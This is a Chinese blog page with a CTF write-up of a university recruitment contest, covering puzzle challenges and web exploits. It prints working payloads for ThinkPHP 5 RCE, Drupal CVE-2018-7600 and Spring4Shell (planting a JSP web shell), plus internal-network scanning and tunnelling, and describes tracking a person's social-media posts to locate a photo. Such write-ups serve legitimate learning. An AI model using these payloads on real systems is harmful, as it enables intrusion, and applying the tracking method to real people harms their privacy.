<!doctype html>
<html lang="zh"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta><title>2023 Yulin Recruit Writeup - 非零跳转</title><link rel="manifest" href="/manifest.json"><meta name="application-name" content="非零跳转"><meta name="msapplication-TileImage" content="/img/favicon.svg"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-title" content="非零跳转"><meta name="apple-mobile-web-app-status-bar-style" content="default"><meta name="description" content="[Baby]†签到†很简单的信息搜索题，题干提到了塞尔达，猜想是塞尔达游戏中文字，搜索到塞尔达希卡文转换器，转换得到flag希卡文转换器"><meta property="og:type" content="blog"><meta property="og:title" content="2023 Yulin Recruit Writeup"><meta property="og:url" content="http://jnzjahangir.top/posts/930c56c4c613/"><meta property="og:site_name" content="非零跳转"><meta property="og:description" content="[Baby]†签到†很简单的信息搜索题，题干提到了塞尔达，猜想是塞尔达游戏中文字，搜索到塞尔达希卡文转换器，转换得到flag希卡文转换器"><meta property="og:locale" content="zh_CN"><meta property="og:image" content="http://jnzjahangir.top/img/og_image.png"><meta property="article:published_time" content="2023-10-28T12:56:00.000Z"><meta property="article:modified_time" content="2023-10-28T12:56:00.000Z"><meta property="article:author" content="Jnz"><meta property="article:tag" content="CTF"><meta property="article:tag" content="WriteUp"><meta property="twitter:card" content="summary"><meta property="twitter:image:src" content="http://jnzjahangir.top/img/og_image.png"><script type="application/ld+json">{"@context":"https://schema.org","@type":"BlogPosting","mainEntityOfPage":{"@type":"WebPage","@id":"http://jnzjahangir.top/posts/930c56c4c613/"},"headline":"2023 Yulin Recruit Writeup","image":["http://jnzjahangir.top/img/og_image.png"],"datePublished":"2023-10-28T12:56:00.000Z","dateModified":"2023-10-28T12:56:00.000Z","author":{"@type":"Person","name":"Jnz"},"publisher":{"@type":"Organization","name":"非零跳转","logo":{"@type":"ImageObject","url":"http://jnzjahangir.top/img/logo.svg"}},"description":"[Baby]†签到†很简单的信息搜索题，题干提到了塞尔达，猜想是塞尔达游戏中文字，搜索到塞尔达希卡文转换器，转换得到flag希卡文转换器"}</script><link rel="canonical" href="http://jnzjahangir.top/posts/930c56c4c613/"><link rel="icon" href="/img/favicon.svg"><link rel="stylesheet" href="https://use.fontawesome.com/releases/v6.0.0/css/all.css"><link data-pjax rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@11.7.0/styles/atom-one-light.css"><link rel="stylesheet" href="https://fonts.lug.ustc.edu.cn/css2?family=Noto+Sans+SC:wght@400;600&amp;family=Roboto+Mono"><link data-pjax rel="stylesheet" href="/css/default.css"><style>body>.footer,body>.navbar,body>.section{opacity:0}</style><!--!--><!--!--><!--!--><!--!--><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/cookieconsent@3.1.1/build/cookieconsent.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/lightgallery@1.10.0/dist/css/lightgallery.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/justifiedGallery@3.8.1/dist/css/justifiedGallery.min.css"><!--!--><!--!--><!--!--><style>.pace{-webkit-pointer-events:none;pointer-events:none;-webkit-user-select:none;-moz-user-select:none;user-select:none}.pace-inactive{display:none}.pace .pace-progress{background:#3273dc;position:fixed;z-index:2000;top:0;right:100%;width:100%;height:2px}</style><script src="https://cdn.jsdelivr.net/npm/pace-js@1.2.4/pace.min.js"></script><!--!--><!--!--><!-- hexo injector head_end start --><script>
  (function () {
      function switchTab() {
          if (!location.hash) {
            return;
          }

          const id = '#' + CSS.escape(location.hash.substring(1));
          const $tabMenu = document.querySelector(`.tabs a[href="${id}"]`);
          if (!$tabMenu) {
            return;
          }

          const $tabMenuContainer = $tabMenu.parentElement.parentElement;
          Array.from($tabMenuContainer.children).forEach($menu => $menu.classList.remove('is-active'));
          Array.from($tabMenuContainer.querySelectorAll('a'))
              .map($menu => document.getElementById($menu.getAttribute("href").substring(1)))
              .forEach($content => $content.classList.add('is-hidden'));

          if ($tabMenu) {
              $tabMenu.parentElement.classList.add('is-active');
          }
          const $activeTab = document.querySelector(id);
          if ($activeTab) {
              $activeTab.classList.remove('is-hidden');
          }
      }
      switchTab();
      window.addEventListener('hashchange', switchTab, false);
  })();
  </script><!-- hexo injector head_end end --><meta name="generator" content="Hexo 7.3.0"></head><body class="is-2-column"><nav class="navbar navbar-main"><div class="container navbar-container"><div class="navbar-brand justify-content-center"><a class="navbar-item navbar-logo" href="/"><img src="/img/logo.svg" alt="非零跳转" height="28"></a></div><div class="navbar-menu"><div class="navbar-start"><a class="navbar-item" href="/">主页</a><a class="navbar-item" href="/archives">归档</a><a class="navbar-item" href="/categories">分类</a><a class="navbar-item" href="/tags">标签</a><a class="navbar-item" href="/about">关于</a></div><div class="navbar-end"><a class="navbar-item is-hidden-tablet catalogue" title="目录" href="javascript:;"><i class="fas fa-list-ul"></i></a><a class="navbar-item search" title="搜索" href="javascript:;"><i class="fas fa-search"></i></a></div></div></div></nav><section class="section"><div class="container"><div class="columns"><div class="column order-2 column-main is-8-tablet is-8-desktop is-9-widescreen"><div class="card"><article class="card-content article" role="article"><h1 class="title is-3 is-size-4-mobile">2023 Yulin Recruit Writeup</h1><div class="article-meta is-size-7 is-uppercase level is-mobile"><div class="level-left"><i class="fa-solid fa-calendar-days fa-fw"></i><span class="level-item"><time dateTime="2023-10-28T12:56:00.000Z" title="2023/10/28 20:56:00">2023-10-28</time>发表</span><i class="fa-solid fa-calendar-check fa-fw"></i><span class="level-item"><time dateTime="2023-10-28T12:56:00.000Z" title="2023/10/28 20:56:00">2023-10-28</time>更新</span><span class="level-item"><i class="fa-regular fa-folder-open fa-fw"></i><a class="link-muted" href="/categories/WriteUp/">WriteUp</a></span><span class="level-item"><i class="fa-solid fa-book fa-fw"></i>12 分钟读完 (大约1806个字)</span></div></div><div class="content"><h2 id="Baby-†签到†"><a href="#Baby-†签到†" class="headerlink" title="[Baby]†签到†"></a>[Baby]†签到†</h2><p>很简单的信息搜索题，题干提到了塞尔达，猜想是塞尔达游戏中文字，搜索到塞尔达希卡文转换器，转换得到flag<br><a target="_blank" rel="noopener" href="https://kinglisky.github.io/zelda-words/">希卡文转换器</a></p>
<span id="more"></span>

<h2 id="Easy-♪绝♩对♫音♬感♪"><a href="#Easy-♪绝♩对♫音♬感♪" class="headerlink" title="[Easy]♪绝♩对♫音♬感♪"></a>[Easy]♪绝♩对♫音♬感♪</h2><p>听音乐发现什么也听不出来，用<em>WinHex</em>打开拖到最后发现一串Ascii码：</p>
<blockquote>
<p>The interval of each byte data is 9 and the first byte is at the beginning of the wav data  </p>
</blockquote>
<p>告诉我们每个数据之间的间隔是9个字节，写一个脚本：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> os</span><br><span class="line"></span><br><span class="line">f=<span class="built_in">open</span>(file=<span class="string">&quot;music.wav&quot;</span>,mode=<span class="string">&quot;rb&quot;</span>)</span><br><span class="line">data=f.read()</span><br><span class="line"></span><br><span class="line">wf=<span class="built_in">open</span>(file=<span class="string">&quot;result.txt&quot;</span>,mode=<span class="string">&quot;wb&quot;</span>)</span><br><span class="line"></span><br><span class="line">wfdata=<span class="built_in">bytes</span>()</span><br><span class="line"></span><br><span class="line">j=<span class="number">0</span></span><br><span class="line">inter=<span class="number">9</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> data:</span><br><span class="line">    j+=<span class="number">1</span></span><br><span class="line">    <span class="keyword">if</span> j&lt;<span class="number">15</span>: <span class="keyword">continue</span></span><br><span class="line">    <span class="keyword">if</span> inter == <span class="number">9</span>:</span><br><span class="line">        wfdata=wfdata+data[j-<span class="number">1</span>].to_bytes(<span class="number">1</span>,byteorder=<span class="string">&#x27;little&#x27;</span>, signed=<span class="literal">False</span>)</span><br><span class="line">        inter=<span class="number">0</span></span><br><span class="line">    <span class="keyword">else</span>: inter+=<span class="number">1</span></span><br><span class="line"></span><br><span class="line">wf.write(wfdata)</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;done&quot;</span>)</span><br></pre></td></tr></table></figure>
<p>(写的太垃圾，跑了好久)<br>跑出来发现开头是一封看不懂的垃圾邮件，下面是一整本三体小说</p>
<blockquote>
<p>Dear Friend ; Especially for you - this red-hot announcement<br>! We will comply with all removal requests ! This mail<br>is being sent in compliance with Senate bill 2116 ;<br>Title 1 ; Section 303 ! This is NOT unsolicited bulk<br>mail ! Why work for somebody else when you can become<br>rich within 81 months . Have you ever noticed nearly<br>every commercial on television has a .com on in it<br>and nearly every commercial on television has a .com<br>on in it . Well, now is your chance to capitalize on<br>this ! We will help you deliver goods right to the<br>customer’s doorstep and use credit cards on your website<br>! You can begin at absolutely no cost to you . But<br>don’t believe us . Ms Ames who resides in New Jersey<br>tried us and says “Now I’m rich many more things are<br>possible” ! This offer is 100% legal . So make yourself<br>rich now by ordering immediately ! Sign up a friend<br>and you get half off . Thanks ! Dear Salaryman ; Especially<br>for you - this amazing intelligence ! If you are not<br>interested in our publications and wish to be removed<br>from our lists, simply do NOT respond and ignore this<br>mail . This mail is being sent in compliance with Senate<br>bill 2716 , Title 3 , Section 303 ! This is different<br>than anything else you’ve seen . Why work for somebody<br>else when you can become rich within 87 days . Have<br>you ever noticed most everyone has a cellphone and<br>society seems to be moving faster and faster . Well,<br>now is your chance to capitalize on this ! WE will<br>help YOU use credit cards on your website &amp; turn your<br>business into an E-BUSINESS . You can begin at absolutely<br>no cost to you ! But don’t believe us ! Mr Ames of<br>Colorado tried us and says “I’ve been poor and I’ve<br>been rich - rich is better” ! We are licensed to operate<br>in all states . Do not delay - order today ! Sign up<br>a friend and you’ll get a discount of 50% . Thank-you<br>for your serious consideration of our offer . </p>
</blockquote>
<p>不知道是干嘛的，搜了一下才知道是垃圾邮件编码…<br><a target="_blank" rel="noopener" href="https://www.spammimic.com/decode.cgi">spamdecode</a><br>解密即可</p>
<h2 id="Mid-马赛克星球"><a href="#Mid-马赛克星球" class="headerlink" title="[Mid-]马赛克星球"></a>[Mid-]马赛克星球</h2><p>emm只做出来第一问<br>是个简单的CRC爆破，附上脚本代码</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> zlib</span><br><span class="line"><span class="keyword">import</span> struct</span><br><span class="line"><span class="keyword">import</span> argparse</span><br><span class="line"><span class="keyword">import</span> itertools</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">parser = argparse.ArgumentParser()</span><br><span class="line">parser.add_argument(<span class="string">&quot;-f&quot;</span>, <span class="built_in">type</span>=<span class="built_in">str</span>, default=<span class="literal">None</span>, required=<span class="literal">True</span>,</span><br><span class="line">                    <span class="built_in">help</span>=<span class="string">&quot;输入同级目录下图片的名称&quot;</span>)</span><br><span class="line">args  = parser.parse_args()</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">bin_data = <span class="built_in">open</span>(args.f, <span class="string">&#x27;rb&#x27;</span>).read()</span><br><span class="line">crc32key = zlib.crc32(bin_data[<span class="number">12</span>:<span class="number">29</span>]) <span class="comment"># 计算crc</span></span><br><span class="line">original_crc32 = <span class="built_in">int</span>(bin_data[<span class="number">29</span>:<span class="number">33</span>].<span class="built_in">hex</span>(), <span class="number">16</span>) <span class="comment"># 原始crc</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> crc32key == original_crc32: <span class="comment"># 计算crc对比原始crc</span></span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&#x27;宽高没有问题!&#x27;</span>)</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">    input_ = <span class="built_in">input</span>(<span class="string">&quot;宽高被改了, 是否CRC爆破宽高? (Y/n):&quot;</span>)</span><br><span class="line">    <span class="keyword">if</span> input_ <span class="keyword">not</span> <span class="keyword">in</span> [<span class="string">&quot;Y&quot;</span>, <span class="string">&quot;y&quot;</span>, <span class="string">&quot;&quot;</span>]:</span><br><span class="line">        exit()</span><br><span class="line">    <span class="keyword">else</span>: </span><br><span class="line">        <span class="keyword">for</span> i, j <span class="keyword">in</span> itertools.product(<span class="built_in">range</span>(<span class="number">10000</span>), <span class="built_in">range</span>(<span class="number">10000</span>)):</span><br><span class="line">            data = bin_data[<span class="number">12</span>:<span class="number">16</span>] + struct.pack(<span class="string">&#x27;&gt;i&#x27;</span>, i) + struct.pack(<span class="string">&#x27;&gt;i&#x27;</span>, j) + bin_data[<span class="number">24</span>:<span class="number">29</span>]</span><br><span class="line">            crc32 = zlib.crc32(data)</span><br><span class="line">            <span class="keyword">if</span>(crc32 == original_crc32):</span><br><span class="line">                <span class="built_in">print</span>(<span class="string">f&quot;\nCRC32: <span class="subst">&#123;<span class="built_in">hex</span>(original_crc32)&#125;</span>&quot;</span>)</span><br><span class="line">                <span class="built_in">print</span>(<span class="string">f&quot;宽度: <span class="subst">&#123;i&#125;</span>, hex: <span class="subst">&#123;<span class="built_in">hex</span>(i)&#125;</span>&quot;</span>)</span><br><span class="line">                <span class="built_in">print</span>(<span class="string">f&quot;高度: <span class="subst">&#123;j&#125;</span>, hex: <span class="subst">&#123;<span class="built_in">hex</span>(j)&#125;</span>&quot;</span>)</span><br><span class="line">                exit(<span class="number">0</span>)</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<h2 id="Easy-盒武器"><a href="#Easy-盒武器" class="headerlink" title="[Easy]盒武器"></a>[Easy]盒武器</h2><p>最喜欢的开盒环节<br>第一张照片简单的识图就可以找到是武汉理工大学南湖校区的建筑物，网上很多信息说它是图书馆，然而并不是，建议全景仔细看看…<br>第二张照片是一座巨大的桥，而且可以看到桥上有国旗，判断应该就是国庆期间拍的。打开<em><strong>Suzuran</strong></em>的空间，发现他国庆期间去了武汉，那这个应该就是武汉长江大桥没跑了。观察拍摄点周围有树，判断应该是公园，打开地图，武汉长江大桥附近有个龟山风景区，就是这个了。<br>至于时间，发现<em><strong>Suzuran</strong></em>在<strong>10月5日</strong>发了两条说说，一条是在江边，一条是在桥上，猜测该照片在10月5日拍摄，然后穷举时间…</p>
<h2 id="Baby-babyphp"><a href="#Baby-babyphp" class="headerlink" title="[Baby]babyphp"></a>[Baby]babyphp</h2><p>第一问是简单的php弱比较，由于哈希函数对于数组类型的参数返回都为0，因此可以考虑构造数组绕过，即<code>a[]=1&amp;b[]=2</code><br>对于第二问，查询资料可知，md5是存在强碰撞的，即就是两个不同的数据算出来的md5值有可能相等。找到相关工具<em>fastcoll</em>之后，使用其对<strong>cat &#x2F;flag2</strong>进行强碰撞，然后编码提交  </p>
<h2 id="Baby-babyunserialize"><a href="#Baby-babyunserialize" class="headerlink" title="[Baby]babyunserialize"></a>[Baby]babyunserialize</h2><p>因为实在没想到第二问怎么做，所以只水了第一问…<br>简单构造所需的类即可</p>
<h2 id="EASY-Script-Kiddie"><a href="#EASY-Script-Kiddie" class="headerlink" title="[EASY]Script Kiddie"></a>[EASY]Script Kiddie</h2><p>简单的信息搜集题<br>第一个直接搜索ThinkPHP V5就搜到漏洞了，payload为</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://121.5.35.176:30002//index.php?s=index/think\app/invokefunction&amp;function=call_user_func_array&amp;vars[0]=system&amp;vars[1][]=whoami</span><br></pre></td></tr></table></figure>
<p>第二个打开发现是drupal框架，搜索相关漏洞，找到远程代码执行漏洞CVE-2018-7600<br>根据相关教程提交post请求：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">POST /user/register?element_parents=account/mail/%23value&amp;ajax_form=1&amp;_wrapper_format=drupal_ajax HTTP/1.1</span><br><span class="line">Host: 121.5.35.176:30003</span><br><span class="line">Accept-Encoding: gzip, deflate</span><br><span class="line">Accept: */*</span><br><span class="line">Accept-Language: en</span><br><span class="line">User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)</span><br><span class="line">Connection: close</span><br><span class="line">Content-Type: application/x-www-form-urlencoded</span><br><span class="line">Content-Length: 107</span><br><span class="line"></span><br><span class="line">form_id=user_register_form&amp;_drupal_ajax=1&amp;mail[#post_render][]=exec&amp;mail[#type]=markup&amp;mail[#markup]=whoami</span><br></pre></td></tr></table></figure>
<p>最后一个为spring框架，在cve官网搜索相关漏洞，注意到CVE-2022-22965这个远程代码执行漏洞，搜索后发现即是本题<br>首先发送get请求更改日志：  </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">GET /?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&amp;class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&amp;class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&amp;class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&amp;class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat= HTTP/1.1</span><br><span class="line">Host: 121.5.35.176:30004</span><br><span class="line">Accept-Encoding: gzip, deflate</span><br><span class="line">Accept: */*</span><br><span class="line">Accept-Language: en</span><br><span class="line">User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) 	AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 		Safari/537.36</span><br><span class="line">Connection: close</span><br><span class="line">suffix: %&gt;//</span><br><span class="line">c1: Runtime</span><br><span class="line">c2: &lt;%</span><br><span class="line">DNT: 1</span><br></pre></td></tr></table></figure>
<p>然后访问链接实现rce：  </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://121.5.35.176:30004/tomcatwar.jsp?pwd=j&amp;cmd=whoami</span><br></pre></td></tr></table></figure>
<p>参考链接：<br><a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_45676913/article/details/105467321">攻防世界 ThinkPHP V5（漏洞解析及利用）</a><br><a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_42742658/article/details/112479848">Drupal 漏洞 CVE-2018-7600 远程代码执行-复现</a><br><a target="_blank" rel="noopener" href="https://blog.csdn.net/laobanjiull/article/details/124054250">CVE-2022-22965：Spring远程代码执行漏洞</a></p>
<h2 id="Baby-RseaE-季末大酬宾"><a href="#Baby-RseaE-季末大酬宾" class="headerlink" title="[Baby]RseaE(季末大酬宾)"></a>[Baby]RseaE(季末大酬宾)</h2><p>内网渗透入门题，每一道题的漏洞都已经写在题干上了<br>题目给了一台可以连通外网和内网的主机，用scp上传fscan扫描得到四个ip</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">10.0.20.111:22 open</span><br><span class="line">10.0.20.1:22 open</span><br><span class="line">10.0.20.121:80 open</span><br><span class="line">10.0.20.199:80 open</span><br><span class="line">10.0.20.167:80 open</span><br><span class="line">10.0.20.156:80 open</span><br><span class="line">10.0.20.199:443 open</span><br><span class="line">[*] WebTitle:http://10.0.20.156        code:200 len:120    title:Hello</span><br><span class="line">[*] WebTitle:http://10.0.20.121        code:302 len:0      title:None 跳转url: http://10.0.20.121/solr/</span><br><span class="line">[*] WebTitle:http://10.0.20.199        code:200 len:96     title:Hello</span><br><span class="line">[*] WebTitle:http://10.0.20.121/solr/  code:200 len:13138  title:Solr Admin</span><br><span class="line">[*] WebTitle:http://10.0.20.167        code:200 len:228    title:Struct-2.5.16-Demo</span><br><span class="line">[*] WebTitle:https://10.0.20.199       code:200 len:96     title:Hello</span><br><span class="line">[+] http://10.0.20.121 poc-yaml-solr-velocity-template-rce </span><br></pre></td></tr></table></figure>
<p>接下来就是快乐的脚本小子时间<br><a target="_blank" rel="noopener" href="https://www.cnblogs.com/Found404/p/14302902.html">CVE-2019-17558</a><br><a target="_blank" rel="noopener" href="https://www.cnblogs.com/Cl0ud/p/14248937.html">CVE-2014-6271</a><br><a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_42019588/article/details/113243932">CVE-2019-0230</a><br><a target="_blank" rel="noopener" href="https://www.freebuf.com/column/194171.html">CVE-2014-0160</a><br>别忘了使用ssh内网穿透在本地机攻击  </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ssh -L [local port]:[intranet ip]:[intranet port] [user]@[remote ip] -p [remote port]</span><br></pre></td></tr></table></figure></div><div class="article-licensing box"><div class="licensing-title"><p>2023 Yulin Recruit Writeup</p><p><a href="http://jnzjahangir.top/posts/930c56c4c613/">http://jnzjahangir.top/posts/930c56c4c613/</a></p></div><div class="licensing-meta level is-mobile"><div class="level-left"><div class="level-item is-narrow"><div><h6>作者</h6><p>Jnz</p></div></div><div class="level-item is-narrow"><div><h6>发布于</h6><p>2023-10-28</p></div></div><div class="level-item is-narrow"><div><h6>更新于</h6><p>2023-10-28</p></div></div><div class="level-item is-narrow"><div><h6>许可协议</h6><p><a class="icons" rel="noopener" target="_blank" title="Creative Commons" href="https://creativecommons.org/"><i class="icon fab fa-creative-commons"></i></a><a class="icons" rel="noopener" target="_blank" title="Attribution" href="https://creativecommons.org/licenses/by/4.0/"><i class="icon fab fa-creative-commons-by"></i></a><a class="icons" rel="noopener" target="_blank" title="Noncommercial" href="https://creativecommons.org/licenses/by-nc/4.0/"><i class="icon fab fa-creative-commons-nc"></i></a></p></div></div></div></div></div><hr style="height:1px;margin:1rem 0"><div class="level is-mobile is-flex"><div class="article-tags is-size-7 mb-4"><span class="mr-2"><i class="fa-solid fa-tag fa-fw"></i> </span><a class="link-muted mr-2" rel="tag" href="/tags/CTF/">CTF</a><a class="link-muted mr-2" rel="tag" href="/tags/WriteUp/">WriteUp</a></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/social-share.js@1.0.16/dist/css/share.min.css"><div class="social-share"></div><script src="https://cdn.jsdelivr.net/npm/social-share.js@1.0.16/dist/js/social-share.min.js"></script></div></article></div><!--!--><nav class="post-navigation mt-4 level is-mobile"><div class="level-start"><a class="article-nav-prev level level-item link-muted" href="/posts/e46de030b77f/"><i class="level-item fas fa-chevron-left"></i><span class="level-item">Local file inclusion</span></a></div><div class="level-end"><a class="article-nav-next level level-item link-muted" href="/posts/6257e9de6790/"><span class="level-item">快速幂</span><i class="level-item fas fa-chevron-right"></i></a></div></nav><div class="card" id="comments"><div class="card-content"><h3 class="title is-5">评论</h3><div class="content" id="valine-thread"></div><script src="//cdn.jsdelivr.net/npm/leancloud-storage@3/dist/av-min.js"></script><script src="https://cdn.jsdelivr.net/npm/valine@1.4.16/dist/Valine.min.js"></script><script>new Valine({
            el: '#valine-thread',
            appId: "htBe2vyV6GcBjZ8A9IdtgkPf-gzGzoHsz",
            appKey: "1WkVIqvJ5VHJa6R9AO0s5vrn",
            
            avatar: "mm",
            avatarForce: false,
            meta: ["nick","mail"],
            pageSize: 10,
            lang: "zh-CN",
            visitor: false,
            highlight: true,
            recordIP: false,
            
            
            
            enableQQ: false,
            requiredFields: [],
        });</script></div></div></div><div class="column column-left is-4-tablet is-4-desktop is-3-widescreen  order-1"><div class="card widget" data-type="profile"><div class="card-content"><nav class="level"><div class="level-item has-text-centered flex-shrink-1"><div><figure class="image is-96x96 mx-auto mb-2"><img class="avatar" src="/img/avatar.png" alt="Jnz"></figure><p class="title is-size-4 is-block" style="line-height:inherit;">Jnz</p><p class="is-size-6 is-block" style="margin-bottom: 3px;">重生之我要成为逆向大手子</p><p class="is-size-6 is-flex justify-content-center"><span><i class="fa-solid fa-school fa-fw"></i> UESTC</span></p></div></div></nav><nav class="level is-mobile"><div class="level-item has-text-centered is-marginless"><div><p class="heading">文章</p><a href="/archives/"><p class="title">6</p></a></div></div><div class="level-item has-text-centered is-marginless"><div><p class="heading">分类</p><a href="/categories/"><p class="title">4</p></a></div></div><div class="level-item has-text-centered is-marginless"><div><p class="heading">标签</p><a href="/tags/"><p class="title">7</p></a></div></div></nav></div></div><div class="card widget" id="toc" data-type="toc"><div class="card-content"><div class="menu"><h3 class="menu-label">目录</h3><ul class="menu-list"><li><a class="level is-mobile" href="#Baby-†签到†"><span class="level-left"><span class="level-item">1</span><span class="level-item">[Baby]†签到†</span></span></a></li><li><a class="level is-mobile" href="#Easy-♪绝♩对♫音♬感♪"><span class="level-left"><span class="level-item">2</span><span class="level-item">[Easy]♪绝♩对♫音♬感♪</span></span></a></li><li><a class="level is-mobile" href="#Mid-马赛克星球"><span class="level-left"><span class="level-item">3</span><span class="level-item">[Mid-]马赛克星球</span></span></a></li><li><a class="level is-mobile" href="#Easy-盒武器"><span class="level-left"><span class="level-item">4</span><span class="level-item">[Easy]盒武器</span></span></a></li><li><a class="level is-mobile" href="#Baby-babyphp"><span class="level-left"><span class="level-item">5</span><span class="level-item">[Baby]babyphp</span></span></a></li><li><a class="level is-mobile" href="#Baby-babyunserialize"><span class="level-left"><span class="level-item">6</span><span class="level-item">[Baby]babyunserialize</span></span></a></li><li><a class="level is-mobile" href="#EASY-Script-Kiddie"><span class="level-left"><span class="level-item">7</span><span class="level-item">[EASY]Script Kiddie</span></span></a></li><li><a class="level is-mobile" href="#Baby-RseaE-季末大酬宾"><span class="level-left"><span class="level-item">8</span><span class="level-item">[Baby]RseaE(季末大酬宾)</span></span></a></li></ul></div></div><style>#toc .menu-list > li > a.is-active + .menu-list { display: block; }#toc .menu-list > li > a + .menu-list { display: none; }</style><script src="/js/toc.js" defer></script></div></div><!--!--></div></div></section><footer class="footer"><div class="container"><div class="level"><div class="level-start"><a class="footer-logo is-block mb-2" href="/"><img src="/img/logo.svg" alt="非零跳转" height="28"></a><p class="is-size-7"><span>&copy; 2024 Jnz</span>  Powered by <a href="https://hexo.io/" target="_blank" rel="noopener">Hexo</a> &amp; <a href="https://github.com/ppoffice/hexo-theme-icarus" target="_blank" rel="noopener">Icarus</a></p></div><div class="level-end"></div></div></div></footer><script src="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/moment@2.22.2/min/moment-with-locales.min.js"></script><script src="https://cdn.jsdelivr.net/npm/clipboard@2.0.4/dist/clipboard.min.js" defer></script><script>moment.locale("zh-cn");</script><script>var IcarusThemeSettings = {
            article: {
                highlight: {
                    clipboard: true,
                    fold: 'unfolded'
                }
            }
        };</script><script data-pjax src="/js/column.js"></script><script src="/js/animation.js"></script><a id="back-to-top" title="回到顶端" href="javascript:;"><i class="fas fa-chevron-up"></i></a><script data-pjax src="/js/back_to_top.js" defer></script><!--!--><!--!--><!--!--><script src="https://cdn.jsdelivr.net/npm/cookieconsent@3.1.1/build/cookieconsent.min.js" defer></script><script>window.addEventListener("load", () => {
      window.cookieconsent.initialise({
        type: "info",
        theme: "edgeless",
        static: false,
        position: "bottom-left",
        content: {
          message: "此网站使用Cookie来改善您的体验。",
          dismiss: "知道了！",
          allow: "允许使用Cookie",
          deny: "拒绝",
          link: "了解更多",
          policy: "Cookie政策",
          href: "https://www.cookiesandyou.com/",
        },
        palette: {
          popup: {
            background: "#edeff5",
            text: "#838391"
          },
          button: {
            background: "#4b81e8"
          },
        },
      });
